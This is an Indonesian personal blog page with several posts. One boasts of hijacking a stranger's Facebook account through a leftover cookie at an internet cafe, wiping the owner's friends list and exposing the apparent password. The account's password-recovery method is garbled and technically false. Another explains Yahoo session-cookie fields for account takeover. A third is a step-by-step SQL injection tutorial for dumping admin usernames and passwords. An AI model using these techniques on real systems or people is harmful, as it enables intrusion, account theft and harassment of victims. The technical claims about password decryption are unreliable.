Meninggalkan Cookie Login Sama Dengan Bunuh Diri [Cerita Hacking Siank Tadi]

Selamat Malem Sahabat DJ Site Semua,

Biarpun masih Ngejar Deadline Akhir Tahun, cuma klo gak posting dan Ng'liat Blog ini sehari rasanya ada yang hilang di Hidup saya hhe... untuk itu malem ini saya sempet-sempetin Posting dulu hhe... Setelah kemaren saya ng'bahasa tentang Pertandingan Indonesia VS Filipina di postingan Cerita Dari GBK, Malem ini saya mau ngajak anda ng'liat gimana cara maling *cuma Istilah kaya saya maenin akun orang lain hhe... :P

Tapi kaya biasa, sebelum saya nulis dan nantinya anda baca kita bersulang dulu.... Cheeerrrss....(Glek...glek...glek...)...

Lanjut, kejadian yang mau saya ceritain ini baru berlangsung tadi siank. Tepatnya di Warnet bilangan Jakarta Selatan *Gak usah saya sebutin nama Warnetnya ya hhe... Awalnya saya kesitu cuma buat Ng'cek E-mail yang lagi bener-bener saya butuhin, cuma setelah billing saya nyalain dan pas saya cek ke History ternyata masih ada Cookie Login Facebook dari orang sebelum saya hhe... :P *Wajah Isenk mulai keluar Dan cerita pun dimulai dari sini...

Setelah saya selesai berurusan sama E-mail yang mendesak tadi... akhirnya saya buka kembali Cookie yang masih tersisa di History itu... Buat apaan? mungkin anda mikir saya orang yang kurang kerjaan, tapi Cookie bisa jadi 1 Postingan kaya malem ini untuk saya ... :P Yupz just Cookie, saya gak butuh Password untuk nginjek Akun orang lain, selama ada E-mail dan Cookie semua bisa diatur hhe...

Oiya samakan persepsi dulu, Dalam hal ini saya gak bertindak sebagai Ethical Hacker, karena saya gak ada perjanjian apapun sama yang akunnya sama Malingin itu hhe... Dan ini murni untuk memberikan gambaran pada anda... dan pada akhir postingan akan saya jelaskan maksud saya...

Untuk yang belum tau apa itu Cookie: Coba lihat Login Form apapun seperti E-mail, Fb, Twitter, Blogger, atau apapun yang pernah anda buka, dan lihat adakah pilihan centang untuk mengingat Username? Nha data dari Username yang disimpan itu yang disebut Cookie... sebenernya sih anda gak Centang pun Datanya bakalan kebentuk sendiri klo anda Login... cuma klo hanya data tanpa Username atau E-mail itu jelas bukan pilihan Maling untuk nginjek Akun anda... Kenapa? saya kasih ilustrasi dulu deh...

Saat seorang maling mau membobol rumah orang lain, apa yang harus dia ketahui terlebih dahulu? Yupz tepat, lokasi rumahnya karena tanpa tau lokasi yang mau dijebol anda gak mungkin bisa beraksi... dan Username atau E-mail itu yang saya ilustrasikan sebagai Rumah... sedangkan Password disini hanya saya fungsikan sebagai Kunci Pintu Depan, dan maling gak perlu punya Kunci kan untuk jebol Rumah orang lain hhe... itu kenapa saya bilang Password gak penting disini....

Klo anda baca postingan saya tentang Yahoo di postingan Ratusan Mirror Link Ke WikiLeaks Dan Jawaban Atas Pertanyaan Sahabat DJ Site beberapa hari lalu, bisa dibilang cara kali ini intinya sama, yaitu Masuk dari Cookie dan bukan dari Login Form, cuma bedanya untuk Akun sekelas Facebook saya gak butuh nebak-nebak buta kaya kemaren hhe... Dan yang saya butuh cuma nginjek melalui Address bar, Yupz tepat di Url Sisa Cookie tersebut....

Caranya silahkan tanya ke Forum Hacker yang banyak bergentayangan di Dunia Maya... klo Ilmunya sekelas Milw0rm.com harusnya mereka bisa ngasih tau :P karena ilmu ini pun saya dapet dari milw0rm.com dulu... tapi mulai setahun atau 2 tahun lalu saya denger milw0rm.com udah ditutup...

Proses Injeksi *SENSOR*

Setelah Proses Injeksi selesai saya lakukan, akhirnya satu akun berhasil saya buka... Dan ini dia penampakan Akun tersebut:


Untuk ng'liat Detail Akunnya silahkan Klik Gambar diatas. Terlihat bahwa orang ini punya 128 Photo dan 598 orang teman *perhatikan Gambar sebelah kiri. Itu artinya orang ini lumayan Aktif buat facebookan hhe.... Foto Profil dan nama sengaja saya samarkan untuk menghormati yang punya.... namanya G*g* A*d***ta. Pokoknya yang punya akun ini Cowo lah hhe...

Setelah berhasil masuk, akhirnya saya langsung ke Setting untuk tau apa Passwordnya... cuma sayangnya orang ini lumayan pinter, ya pokoknya gak kaya orang-orang lain yang hanya ngasih Password berdasarkan tanggal Lahir atau nama yang tertera di Profil lah hhe... dan karena setelah saya cobain satu-satu dari keterangan yang di Profil hasilnya tetep nihil. Akhirnya saya langsung klik kanan dan ke View Page Source buat nyari Tau Passwordnya dari Sumber HTML-nya.... cuma ternyata Pengamanan Facebook lumayan bagus dalam hal ini, dan saya pun hanya mendapati tanda bintang atau istilah kerennya Password yang udah terenkripsi... berarti gak bisa donk? belum tentu, si bintang-bintang itu tadi emank gak bisa kita akalin tapi kita masih bisa ng'liat variabel untuk Passwordnya, dan kebetulan Facebook meluluskan jalan saya karena mereka udah memberikan Font Merah untuk hal-hal pentig seperti Username Dan password hhe... dan akhirnya ketemulah kode    yang artinya spasi dalam bahasa HTML... Dan dari kode ini akhirnya saya lanjut ke MD5 Enkrip Online, silahkan cari di Goole soalnya ada banyak... dan setelah saya cek dapetlah hasil Enkripsi password yang udah gak berbentuk Bintang tapi berbentuk angka... dan sampe sini kerjaan saya lebih gampang... karena saya cuma tinggal Dekripsi lagi angka-angka itu.... yang biarpun gak ada Tools-nya bisa dengan mudah dilakukan karena rata-rata Social Networking kaya Facebook cuma akan Meng-enkrip password dengan metode 5 atau bisa dibilang tingkat keamanannya masih rendah... tapi seengggaknya gak Metode 1 kaya Yahoo! lah hhe...

Dan akhirnya Password keluar... ********* pun berubah jadi topiholic. Yupz orang ini make Password topiholic ... password yang susah untuk ditebak haha... Dan setelah Passwordnya saya dapet saya langsung ke Deactive Acount


Tenang-tenang, saya gak segitu jahatnya koQ sampe ngapus akun orang, saya cuma mau ng'cek password itu bener atau nggak... dan ternyata setelah saya cek bener...

Dan saya langsung balik ke Setting dan Download semua data dari Acount tersebut, buat apaan? agar yang punya akun bisa ngembaliin datanya yang semula, karena setelah ini saya mau acak-acak dulu bentar... nha karena saya bukan Cracker jadi saya berbaik hati memberikan Seluruh datanya ke E-mail yang digunakannya... Dan setelah itu Proses Pengacakan pun dimulai.... dari sini saya langsung beralih ke Edit Friends.... Dan seluruh temennya yang berjumlah 598 langsung saya bikin Nihil dalam waktu setengah jam.... Dan untuk meninggalkan jejak, saya rubah Foto Profilnya yang gambarnya saya ambil dari Google hhe... Penampakan setelah saya acak-acak jadi kaya gini:



Lebih jelasnya silahkan Klik Gambar diatas. Terlihat disebelah kiri yang tersisa cuma permintaan Teman dan gak ada satupun teman lagi... karena saya lumayan punya etika jadi saya gak ngapus apapun termasuk Foto Pribadinya hhe.... nie Foto-fotonya klo mau liat..



Maaf sengaja saya samarkan semua hhe... Ng'liat foto si Mbah saya jadi inget Yudex nie hhe....

Dan setelah puas, baru saya nulis 3 Status diakun tersebut *padahal di akun sendiri udah 5 bulan gak Update Status wkwkw.... dan penampakannya kaya dibawah ini, silahkan diklik:




Kebaca gak tuh? nie saya tulis ulang deh biar lebih jelas:

Status Pertama: Deactive Acount Process... By Ndeso *saya kan orang desa wkwkw...

Status kedua:

Pesan Moral: Jangan pernah centang ingat saya .. karna tanpa tau Password Anda... atau hanya dengan modal cookie ingat saya... Banyak Hacker yang lebh kejam dapat merusak Informasi anda...

Thnx To: M. Siswandoyo, Jiox Wong Katro, Adit Belantara 'N Semuanya....

Hack By: Serabutan Only...

Untuk mengembalikan tampilan ini, silahkan buka E-mail anda karena semua data telah saya Download dan saya send ke E-mail anda... *Hacker yang bertanggung jawab kan? hhe....

Status ketiga: Acount tidak jadi saya Deactive....

Silahkan Lihat E-mail karena seluruh data sudah saya Download dan Send ke E-mail anda.. untuk mengembalikan Interface anda...

This Is "Kado 4 U"

See More.... klo di klik tulisannya:

Happy New Year.....

Thnx To: M. Siswandoyo, Jiox Wong Katro, Adit Belantara 'N Semuanya....

Hack By: Serabutan Only...

So, itu cuma kejutan akhir tahun dari Blogger Serabutan ini hhe... dan untuk ketiga sahabat baik saya: Kang Pakies, Jiox Alkatro, Dan Adit Belantara Indonesia Maaf saya gak minta izin dulu buat make namanya, karena mereka-mereka itu yang selama ini bikin saya tetep semangat Blogging jadi ucapan terima kasih saya ucapkan untuk mereka hhe.. :P

Dan terakhir, setelah puas ngacak-ngacak dan ngasih tau cara pemulihannya, saya langsung LogOut dan berikut tampilan yang janggal:



Perhatikan Foto di Profil sebelah kiri dan foto di LogOut sebelah kanan, terlihat bahwa Foto Profil lama masih melekat dan itu tidak dengan sengaja saya lakukan, jadi disini saya juga ingin menunjukkan klo Facebook masih punya error dalam hal ini....

Cukup main-main saya hari ini hhe... terima kasih untuk G*g* yang udah bersedia di Hack untuk jadi pelajaran berharga sahabat-sahabat saya *Eh tapi emank dia bersedia ya haha... Dan untuk semuanya pelajaran yang mau saya kasih untuk anda, adalah jangan pernah gunakan Cookie untuk Login Form sekalipun dirumah, atau klo udah terlanjur, jangan pernah lupa untuk ngapus History anda, karena satu kelalaian bisa mengakibatkan data anda hilang dalam 1 Jam... bagus klo yang ngacak-ngacak saya, saya kasih tau lagi pemulihannya lha klo orang lain? ya Wassalam dah haha...

Oiya berhubung saya lumayan Bertanggung jawab dengan apa yang udah saya lakukan, akhirnya saya send E-mail ke dia dan saya kasih Username dan Cookie saya biar adil gitu masa saya aja yang ngacak-ngacak hhe... klo dia bisa ya silahkan juga toh ... biar jadi hadiah Akhir tahun gitu :P

*Klik Gambar untuk melihat Detail yang lebih besar

Buat Sahabat DJ Site Semua, Happy Blogging 'N have a Nice Weekend... :P

Baca Selengkapnya...

Ratusan Mirror Link Ke WikiLeaks Dan Jawaban Atas Pertanyaan Sahabat DJ Site

Selamat Sore Sahabat DJ Site Semua,

Udah pada selesai Kerja apa belum nie? ... apa jangan-jangan ada yang malah meliburkan diri lagi haha... walah ternyata Hari ini Hari Kejepit Nasional ya wkwkw... pantesan koQ sepanjang jalan orang-orang ngomonginnnya libur doank haha... Untung baru sore tadi saya tau klo Besok libur, klo tau-nya dari pagi bisa dipastikan otaQ udah gak semangat ngapa-ngapain alias langsung mengarah ke Hari Libur Besok wkwkw...

"Emank ada Libur apaan cuy besok?" tanya saya sama salah satu temen saya. "Lha Besok kan 1 Muharram Brow" tegas temen saya. "Owh besok Malem 1 Suro toh?" lanjut saya, "Malem 1 Suro? 1 Muharram Bego... malem 1 Suro lagi lu...." lanjut temen saya. Dari pada urusannya panjang, karena dia gak ngerti malem 1 Suro itu apaan, yo mending saya iya-in aja biar cepet wkwkwk... Wah gak kerasa ya udah sampe 1 Muharram lagi hhe... Dan tinggal menghitung minggu kita udah sampe ditahun baru lagi, Hem... Bulan yang paling saya suka hhe... soalnya banyak keluarga saya yang Ulang tahun Bulan ini, jadi bisa Makan dan nonton Film Gratis hahahaa... Dan selain itu, tinggal kembali nginget-nginget harapan tahun kemaren udah terwujud apa belum hhe.... Pokoknya Selamat Tahun baru Hijriah buat semua hhe... :P

Nha terus sore ini mau ngomongin apaan toh kang? Hem... Mending kita lanjutin Obrolan tentang WikiLeaks aja ya, soalnya ternyata dipostingan tentang WikiLeaks kemaren[KLIK DISINI] banyak sahabat DJ Site yang justru baru denger tentang Situs WikiLeaks ini, padahal saya kira nulis postingan tentang WikiLeaks tuh udah bener-bener basi hhe.... Tapi sebelum ng'bahas tentang WikiLeaks saya mau jawab pertanyan dulu ya dari salah satu Sahabat DJ Site. berhubung lagi males bikin postingan khusus jadi dicampur aja deh, pertanyaannya gini:

Ass. mas, Berhubung ng'liat baner hackernya di Blognya *Emank ada toh? oiya ada, saya aja udah lupa pernah masang baner begituan haha... saya mau nanya kalo boleh... *Boleh koQ Free nanya disini hhe.... Dosen saya pernah ngajarin *Waduh berat nie kayanya siap-siap jawab gak tau ah haha... katanya dia bisa ngirim E-Mail pake E-mail orang lain dan bisa baca E-Mail orang lain mas, itu pake cara apaan ya? soalnya Dosen saya cuma cerita dan gak nunjukkin caranya kata dia itu waktu dia masih muda *halah.. Dosen apa guru silat tuh masa Ilmu gak diajarin ke Mahasiswanya ... Jadi klo itu emank bener bisa, saya mau tanya pake Teknik apaan?

Jawaban Ngawur saya:

Berhubung Dosen anda nyobanya waktu dia masih muda, jadi mungkin udah agak sedikit berubah tingkat keamanannya. klo untuk E-Mail Plasa atau Telkomsel emank paling parah tuh tingkat keamanannya, jadi saya jawab bisa untuk 2 E-mail itu karena saya udah coba dulu. klo Untuk Hotmail Dan Gmail saya belum pernah nyoba jadi gak tau bisa apa gak, tapi klo Mbah Google kayanya agak susah tembusnya soalnya Kunci Encriptnya agak ribet untuk dipecahin. Dan untuk yahoo! saya jawab bisa, makanya untuk urusan Kerjaan atau lainnya saya pake Gmail dan Hotmail, bukan karena Waktu Send atau sampe'nya duluan 2 E-mail itu dibanding Yahoo, tapi karena tingkat keamanan dan Privasi saya lebih gak terjamin di yahoo, itu kenapa satu-satunya akun saya yang register pake yahoo cuma facebook, soalnya saya jarang buka akun itu hhe...

Terus yang ditanya apa tekniknya ya... Sebenernya banyak dan kepanjangan juga pasti klo saya jelasin satu-satu jadi saya jelasin teknik yang paling gampang versi saya aja ya, Biasa saya nyebutnya "Teknik Nyolong Kue" klo bahasa Dosen anda atau bagusnya mungkin main-main di Session Cookie hhe... Sekedar tambahan, tolong jangan samakan Cookie dengan Session karena keduanya berbeda, soalnya banyak juga tuh yang ngawur dan nganggap itu sama. gampangnya kita bedakan gini, Klo Cookie itu pemyimpanan data(paling sering Username dan Password yang disimpan), nha klo Session itu menjaga datanya.

Terus gimana caranya? Karena Aplikasi Internet itu banyak yang rada kepinteran. ya termasuk Yahoo ini, jadi ada 2 cara anda masuk ke akun, pertama ya dari Username dan password itu tadi, dan yang ke-dua cuma dari Cookie yang valid karena si Aplikasi servernya pun gak akan bisa bedain mana yang dari Login dan mana yang cuma dari Sniff si Cookie. Lho bukannya Yahoo itu pake https:// toh kang? yupz bener untuk Login ke yahoo anda emank dihadapkan pada Login Form berbasis SSL cuma klo untuk mengakses layanan di dalem Akunnya sih gak perlu pake https:// juga bisa, makanya Dosen anda bilang dia bisa ngirim E-mail atau baca E-mail orang lain. Oiya ini cara gampang versi saya lho ya, jadi saya gak tau dosen anda itu versi ajarannya gimana apa jangan-jangan langsung masuk ke sistemnya atau pake cara lain lagi.

Lanjut, terus gimana cara kita memanfaatkan Cookienya? yang harus anda cari diawal adalah Isi Cookie tersebut, dan untuk Yahoo kebetulan hanya 2 yaitu Y Cookie dan T Cookie, apa bedanya? klo yang Y itu statis sedangkan yang T lebih dinamis. Terus apa isinya?

Kita bahas dari Cookie Y dulu, yang isinya adalah:

v: ini version, isinya pasti 1 jadi gak perlu dicari lagi
n: ini nilai acak dari perubahan data atau Password si User jadi mesti dicari dulu.
l: Username yang di-encode dengan cara paling sederhana yaitu teknik

abcdefghijklmnopqrstuvwxyz0123456789._@-+ Menjadi
0123456789abcdefghijklmnopqrstuvwxyz._@-+

Klo gak salah ini kunci Simetris paling dasar...

Jadi andaikata Usernamenya DJ berarti jadi 3a

r: Register week, klo ini juga gak bisa dipastikan

Jadi, dari Cookie Y klo anda niat masuk ke Akun orang yang harus anda pecahkan adalah nilai variabel n dan r. Silahkan tanya gimana caranya ke Dosen anda....

Selanjutnya kita beralih ke Cookie T, yang berisi:

a: age, biasanya isinya YAE atau QAE, ini cuma untuk pengaturan Privasi yang mengarahkan USer untuk mengakses konten 18+

d: data yang terdiri dari subfield: a,sl, g, k, zz, tip

Keterangan:

a: Age YAE atau QAE
g: Global Unique Identifier, biasanya directnya ke profiles.yahoo.com/u/.
ok: verifikasi E-Mail, biasanya isinya ZW0-.
sl: Sled ID dari database Usernya, jadi gak bakal berubah nie...
zz: timestamp, ini cuma meriksa tanggal Expired doank *kaya roti aja haha..
tip: tcookie ip address, ini ip-nya pengguna

sk: Signature Versi 3(Bukan tanda tangan yg di scan lho ya haha)
ks: Signature Versi 4(Bukan tanda tangan yg di scan lho ya haha)

Jadi dari Cookie T yang perlu anda cari adalah kode sl-nya atau Username itu tadi. klo nilai g bisa anda cari dengan Yahoo Qouery Language Console. Silahkan Search sendiri, saya yakin pasti ada, ya klo gak ada silahkan anda tanya ke Dosen anda, soalnya klo yang jelasin saya semua ya mending jadi Dosen saya dari pada jadi Blogger Serabutan wkwkwkwkwk...

Widih, udah lama saya gak ng'bahas maenan yang berat-berat kaya gini lagi wkwkw... Nha terus mana Janjimu untuk ngomongin tentang WikiLeaks toh Kang?

OK santai, berhubung udah masuk waktu buka, saya ng'batalin puasa dulu ya .. Cheerrss.....(glek..glek...glek...)

OK ng'lanjutin tentang WikiLeaks saya cuma mau ngasih Mirror Link-nya aja untuk anda yang masih penasaran tapi belum bisa nembus WikiLeaks lagi Berikut daftarnya:

• http://freie-re.de/
• http://wikileaks.terrax.info/
• http://www.powned.tv/wikileaks/
• http://wikileaks.info/
• http://digitalevuilnisman.nl/wikileaks/
• http://wikileaks.2600nl.net/
• http://mirror.infoboj.eu/
• http://wikileaks.piratenpartei.de/
• http://wikileaks.piratskapartija.com/
• http://wikileaks.teoriza.org/
• http://wikileaks.whistleblowerschutz.de/
• http://informationsbefreier.de/
• http://213.251.145.96
• http://46.59.1.2
• http://wikileaks.dhumes.com/
• http://wikileaks.dd19.de/
• http://wl.04u.nl/
• http://www.cu2.nl/W1k1l34Ks
• http://wikileaks.indymedia.org/
• http://wikileaks.lalistadesinde.net/
• http://wikileaks.insertco.in/
• http://213.251.145.96/
• http://wikileaks.rickbradley.com/
• http://wikileaks.ultramegaman.com/
• http://wikileaks.realprogrammer.org/
• http://wikileaks.high-color.de/
• http://www.wikileaks.nl/
• https://www.wuala.com/wikileaks/
• http://wikileaks.sebbcn.net/
• http://wi.kileaks.com/
• http://wikileaks.fonolog.com/
• http://leaks.wwwouter.nl/
• http://leaks.be/
• http://www.afgetapt.nl/
• http://wikileaks.rorbuilder.info
• http://www.wikileaks.comiendolimones.com/
• http://wikileaks.hermanuscoenradistraat.nl/
• http://wikileaks.hermanuscoenradistraat16.nl/
• http://wikileaks.zipped.in/
• http://wikileaks.lalistadesinde.net/
• http://wikileaks.iz.rs/
• http://wikileaks.freedomofspee.ch/
• http://openstream.nl/
• http://79.159.1.172/wikileaks/
• http://www.atariprofibuch.de/
• http://wikileaks.sebastianbartsch.eu/
• http://mirror.sebastianbartsch.eu/
• http://leakmirror.users.anapnea.net/
• http://wikileaks.renout.nl/
• http://wikileaks.outofsin.com/
• http://wikileaks.outofsin.es/
• http://wikileaks.servehttp.com/
• http://wikileaks.pl/
• http://88.80.13.160.nyud.net/
• http://wikileaks.piraten-lsa.de/
• http://ljsf.org/
• http://120310wl.frezeb.webfactional.com/
• http://wikileaks.majcenic.info/
• http://mirror.sebastianbartsch.de/ (user/pass: guest)
• http://wikileaks.opperschaap.net/
• http://wikileaks.juridische.info/
• http://wikileaks.lu/
• http://wikileaks.bastianhaas.de/
• http://wikileaks.virtadpt.net/
• http://mirrorleaks.org/
• http://85.88.21.139/
• http://www.wikileaks.fi/
• http://wikileaks.littledrummerboy.info/
• http://wikileaks.countdown4me.com/
• http://wikileaks.no-ip.co.uk
• http://www.roborobo.info/
• http://likiweaks.com
• http://wikileaks.eu/
• http://wikileaks.cx

Nha itu dia Mirror Linknya silahkan dicoba sendiri, hampir semuanya bisa koQ hhe.... klo masih gak bisa KLIK DISINI untuk mengetahui ratusan Mirror link lainnya hhe.... Jadi, untuk anda yang pengen tau tentang Situs ini lebih dalam silahkan iceoba link-link diatas...

Buat Sahabat DJ Site Semua, Happy Blogging 'N Have a Nice Day :P

Baca Selengkapnya...

Banyak Remaja Melakukan Hacking

Saat mendengar judul diatas apa yang ada dibenak anda? Saya sendiri menganggap itu biasa (Karena saya pun demikian sewaktu SMA hhe). Dan sebenarnya kegiatan hacking sendiri menurut saya memberikan banyak ilmu yang justru dapat menghindarkan diri kita sendiri dari aksi hacking orang lain yang biasa kita sebut crakcer/ black hat. Namun, lagi-lagi banyak orang selalu menilai hacker sebagai sesuatu yang identik dengan kejahatan dan kriminal(Walah jauh banget orang-orang mikirnya) yang sebenarnya justru jauh dari kata kriminal. Dan jujur saat membaca salah satu penelitian yang baru-baru ini dilakukan Di London saya sempat merasa kecewa akibat penilaian dari CTO dan Co-Founder Tufin yang kira-kira berkata seperti ini:

"Hacking telah berkembang menjadi sebuah kejahatan serius dalam beberapa tahun belakangan ini. Sangat disayangkan melihat hasil survei ini, yang menunjukkan betapa anak remaja, bahkan di bawah usia 17 tahun sudah tertarik untuk menjajal hacking. Tugas pekerja IT adalah untuk mengatasi aksi hacker. Ini artinya, kita harus mulai mengedukasi bahaya hacker mulai dari usia tersebut Diliput oleh Net Security.

Apa sebenarnya hasil penelitian mereka?

Baru-baru ini sebuah riset yang melibatkan 1.000 orang remaja di London, dan 150 anak berasal dari Cumbria menemukan dari 4 orang remaja, satu di antaranya dipastikan pernah mencoba aksi hacking.



Perusahaan riset bernama Tufin yang tadi saya sebutkan yang berkantor di Inggris berhasil menyelesaikan studi tersebut. Anehnya, meski hasilnya 1:4 namun sekira 78 persen responden remaja mengaku kegiatan hacking merupakan kejahatan (Nah, Lho tambah ga jelas aja malah ngaku jahat).



Kebanyakan mereka mengaku sering mencoba membobol akun Facebook teman-temannnya menggunakan password curian. Bahkan tidak hanya laki-laki, 47 persen dari responden yang mengaku tersebut ternyata wanita(Waduh ini mah bukan hacker kali tapi cracker, ngapain hacker ng’rugiin orang lain?) .



Studi tersebut juga menemukan, 27 persen di antara para responden yang melakukan hacking memilih melakukannya di komputer pribadi dalam kamar, tidak sedikit juga yang melakukan di warnet, yakni sekira 22 persen, atau lewat komputer sekolah yang mencapai 21 persen, dan 19 persen melalui komputer pinjaman.



Kebanyakan mereka yang mengaku pernah mencoba membobol komputer orang lain, sebanyak 46 persennya beralasan hanya untuk senang-senang saja( Haha bahaya banget). Sedangkan 21 persen mengaku untuk uji nyali(emank dunia lain uji nyali haha), dan 20 persen mengaku untuk mendapatkan uang( Nah, klo ini udah masuk black hat). Hanya sebagian kecil responden, yaitu 5 persen, yang mengaku ingin mendapatkan pengalaman sebelum beranjak menuju dewasa dan bekerja secara serius( Nah ini yang disebut hacker).



Selain menguak tabir kelam remaja di internet, studi tersebut juga menemukan sepertiga dari total responden mengaku email atau akun Facebooknya dibobol orang tak dikenal( dengan kata lain ingin balas dendam akibat akunnya sendiri di hack orang hhe).



Tufin juga menemukan, remaja di Cumbria yang mengaku pernah melakukan hacking memiliki usia jauh lebih muda ketimbang remaja Inggris. 78 persen di antaranya telah menjadi hacker sebelum usianya menginjak 13 tahun( Buset 13 tahun mah saya juga baru bisa bikin virus haha). Sedangkan di London, sekitar 44 persen remaja yang pernah menjajal hacking berusia 16 tahun( batas usia wajar). Sisanya berada di bawah usia tersebut.



Selain menyasar Facebook, sekira 18 persen remaja mengaku pernah meng-hack email temannya, 7 persen menghack situs belanja online( ini yang paling sering dilakuin sama cracker), 6 persen pernah membobol email orang tua( walah ga penting banget E-mail orang tua dibobol hhe), dan 5 persen lainnya mengaku pernah mencoba membobol situs sekolah( Klo yang ini saya sendiri pernah nyoba biarpun bukan sekolah sendiri haha). Hanya 3 persen remaja saja yang berani mencoba meng-hack situs perusahaan( waduh klo ini saya ga bakal coba, udah kriminal hho bisa kena UU ITE kita hho).



Untungnya, hanya sedikit responden yang menilai aksi tersebut sebagai sesuatu yang menyenangkan( Patut dipuji nie). 27 persen dari responden mengaku akan serius menjadi hacker( Hacker ya jangan jadi cracker), sedangkan 82 persen mengaku hal tersebut sangat sulit sehingga mereka tidak akan melanjutkannya( haha ada yang nyerah ternyata). Dari total responden, 70 persen di antaranya menganggap hacking perbuatan yang kurang 'gaul'( waduh hacking dari dulu ampe sekarang juga ga gaul dek hha).



"Hacking( Ralat Black hat maksudnya) telah berkembang menjadi sebuah kejahatan serius dalam beberapa tahun belakangan ini. Sangat disayangkan melihat hasil survei ini, yang menunjukkan betapa anak remaja, bahkan di bawah usia 17 tahun sudah tertarik untuk menjajal hacking. Tugas pekerja IT adalah untuk mengatasi aksi hacker( Ralat lagi Cracker mungkin maksudnya). Ini artinya, kita harus mulai mengedukasi bahaya hacker mulai dari usia tersebut,' ujar CTO dan Co-Founder Tufin, seperti dikutip melalui Net Security.

Abis baca penelitian diatas apa yang anda pikirin sekarang?

Saya Cuma berharap anda ga langsung bilang klo hacker itu semuanya orang-orang kriminal( karena saya juga ga mau dibilang gtu hhe), tapi klo cracker anda bilang kriminal nah, itu fakta Sobat. Jadi, nanggapin penelitian itu sih saya Cuma mau bilang klo yang dimaksud kayanya lebih ke cracker dari pada hacker. Dan klo masalah edukasi kayanya dari SMP diajarin hacking pun gpp tuh. Asal dikasih pemahaman yang bener tentang hacking jangan sampe nantinya mereka justru jadi crakcer/ Black hat yang manfaatin ilmunya untuk nyari uang walaupun mereka tau itu salah….

Klo mau ikutan, di kotak komentar yach….

Baca Selengkapnya...

Nghack Website Pake SQL Injection

Postingan ini gw Bikin Untuk salah satu temen kampuz Sekaligus temen Blogger gw MUSA. Kayanya banyak banget ReQuest ye (udah kaya Dahsyat sama Inbox aja) padahal enakan Posting freeware kan gw ga usah pake nyoba dulu hha….Tapi ywdh lah gw Posting mumpung ada waktu (belaga Sibuk).

Waktu itu gw ga Ngeh paz dia Bilang SQL-SQL, gw kira itu software atau database apaan. Tapi paz kemaren gw gy mikir-mikir(SoQ Bener) muncul tuch di otaQ gw SQL Injection N paz gw inget kata dia itu buat Nghack Website…hahaha berarti bener yang dimaksud sama dia ini, makanya gw posting Khusus buat dia.

Pendahuluan Dulu ya biar asiQ ( Kaya Bikin Makalah Aja hhe)

Apa Sih TuCh SQL injection ?

SQL injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke 'query'

dengan cara manipulasi data input ke applikasi tsb.



Udah dah ga Usah pake lama-lama pendahuluannya hhe….

Kalo mau tau pengertian yang lebih jelas Lu Cari aja Di Search Engine (Google,Yahoo, Bing, Cuil Or etc)



1. Pertama kali yang kita lakukan tentu mencari target, ya iya lah klo ga ada yang mau di Hack mah percuma. Misalnya target kita kali ini adalah http://www.target.com/berita.php?id=100



2. Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.



Contoh :

http://www.target.com/berita.php?id=100'



atau



http://www.target.com/berita.php?id=-100



4. Maka akan muncul pesan error...

"You have an error in your SQL syntax.You have an error in your SQL syntax; check the

manual that corresponds to your MySQL server version for the right syntax to use near '''

at line 1" Dan masih banyak lagi macamnya.



5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya...

Disini kita akan menggunakan perintah order by



Contoh :

http://www.target.com/berita.php?id=100+order+by+1/*



Hahaha...apalagi itu "/*" ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake "--". Terserah Lu aja...



Kalo "+" sebagai penghubung perintah...



6. Nah sampe sini langsung dah Lu cobain satu - satu...



http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)

http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)

http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)

http://www.target.com/berita.php?id=100+order+by+4/* (tambah malez)

http://www.target.com/berita.php?id=100+order+by+5/* (jangan nyerah)

Sampai muncul error...

Misalkan errornya disini...



http://www.target.com/berita.php?id=100+order+by+10/*



Berarti yang kita ambil adalah "9"

http://www.target.com/berita.php?id=100+order+by+9/*



7. Untuk mengetahui berapa angka yang show sekarang kita pake UNION



Contoh :

http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*



Trus Lu Liat angka berapa yang keluar (Jadi kaya Togel ye nunggu angka hahaha)



8. Misalnya angka hoki yang keluar adalah "3" maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah "version()" atau "@@version"



http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*



Atau



http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*



9. Nah kalo versinya 5 langsung aja pake perintah "information_schema" untuk melihat tabel dan kolom yang ada pada database...



Contoh :



http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*



Nah, katanya yang ngajarin gw sih kalo buat Ngeliat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gw ga’ pake keliatan kok tabelnya...Apa gw salah? Mungkin tapi belum tentu juga hhe Cuz mank suka-suka gw kan hahaha

Lanjut, Misalnya yang lo liat adalah table "admin"



Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata "table"-nya...



Contoh:

http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*



Misalnya kolom yang keluar adalah "password" dan "username"

Langsung aja kita liat isinya...



Contoh :

http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*



dan



http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*



Bisa diliat dah username ‘N passwordnya...Abiz itu tinggal login aja dah...Cari-cari yang Lu anggap asiQ buat dimainin...Truz terserah Lu aja dah mau diapain asal jangan Ngelanggar Undang-Undang ITE hhe...( Cuz Kita kan White Hat yang taat pemerintah N Cuma Buat Edukasi Doank )

Oiya kaya biasa gw ga tanggung kalo ada apa-apa hhee….

Bukannya Lepas tanggung jawab nie, tapi kan Lu sendiri udah pada gede jadi gw anggap Lu Smua udah tau yang baik sama yang nggak. So, Klo Lu anggap ga baik ya jangan Dicoba….Iya Ga??? Paztinya… atau kalo Lu mau Coba juga ya jangan diapa-apain tuch Web targetnya kalo Lu udah dapet Username ‘N Passwordnya.

Okeh Sekian N’ terima kasih (Kaya Pidato aja gw hahaha)….

Pokoknya Happy Blogging Aja dah buat Smua………

Thnx To: Jasakom, Brother Cruzen, N My Community (*****Hacker And ****Hacker).

Dedicated To: Musa, All Visitor Of DJ-Site…..

